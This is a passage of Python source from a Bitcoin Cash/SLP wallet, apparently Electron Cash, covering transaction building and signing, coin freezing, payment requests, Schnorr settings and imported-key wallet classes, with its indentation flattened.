# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if not x_pubkey[0:2] in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
out['URI'] = '{}:{}?amount={}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
